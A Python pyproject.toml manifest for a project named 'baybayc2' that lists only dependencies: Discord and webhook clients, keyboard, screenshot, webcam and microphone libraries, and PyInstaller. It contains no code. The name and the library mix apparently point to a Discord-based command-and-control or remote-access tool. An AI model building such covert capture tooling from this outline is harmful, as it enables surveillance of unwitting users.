[project]
name = "baybayc2"
version = "0.1.0"
description = "Add your description here"
readme = "README.md"
requires-python = ">=3.12"
dependencies = [
    "discord-py>=2.5.2",
    "discord-webhook>=1.4.1",
    "keyboard>=0.13.5",
    "opencv-python>=4.11.0.86",
    "pillow>=11.3.0",
    "prettytable>=3.16.0",
    "psutil>=7.0.0",
    "pyautogui>=0.9.54",
    "pyinstaller>=6.14.1",
    "scipy>=1.16.0",
    "sounddevice>=0.5.2",
]
